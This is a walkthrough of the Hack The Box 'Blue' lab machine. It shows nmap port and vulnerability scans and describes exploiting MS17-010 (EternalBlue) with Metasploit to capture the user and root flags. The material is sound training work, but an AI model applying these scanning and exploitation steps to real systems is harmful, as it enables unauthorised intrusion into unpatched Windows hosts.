Hack The Box: Blue Walkthrough

130n@calvinlai.com

Author: 

@18 Dec 2019

Acknowledgement:

The game cannot be completed without the support of our friends of CTF Playgroup Hong Kong & Macau        

Background:

Penetrating Methodology:

Service Scanning

Enumeration & Exploitation

Getting Less Privilege Shell

Captured the flag

Walkthrough:

Target machine: 10.10.10.40

Attacking (Hacker) machine: 10.10.14.18

Hacking Process Part 0 – Service Scanning

The target machine IP is 10.10.10.40 Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.

0.1) Quick Pre-searching

nmap -p- 10.10.10.40

0.2) Details Analysis

nmap -sV -p 135,139,445,49152 -A -oN nmap-htb-blue-detail.txt 10.10.10.40

PORT      STATE SERVICE      VERSION

135/tcp   open  msrpc        Microsoft Windows RPC

139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn

445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

49152/tcp open  unknown

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: specialized|WAP|phone

Running: iPXE 1.X, Linux 2.4.X|2.6.X, Sony Ericsson embedded

OS CPE: cpe:/o:ipxe:ipxe:1.0.0%2b cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz

OS details: iPXE 1.0.0+, Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone

Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-security-mode:

|   2.10:

|_    Message signing enabled but not required

|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 139/tcp)

HOP RTT    ADDRESS

1   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 163.69 seconds

Enumeration Strategy

  1. Checking vulnerability for Window 7 on port 135, 139 and 445


Hacking Process Part 1 – Enumeration

1.1) Strategy 1 Check Vulnerability

nmap --script vuln -p 135,139,445 10.10.10.40

Three smb vulnerabilities were identified

  1. MS17-010
  2. MS10-061
  3. MS10-054

Hacking Process Part 2 – Exploitation

2.1) Using Metasploit Windows on SMB MS17-010

Searching the MS17-010

Using the ms17-010-psexec

This payload does not work on this machine.

Try another payload ms17_010_eternablue (As the machine name is Blue)

It can be exploited successfully and get the windows access

Searching the target file “User.txt” and get the key


Searching the target file “root.txt” and get the key

Reference Link

Guide to SMB Enumeration

https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/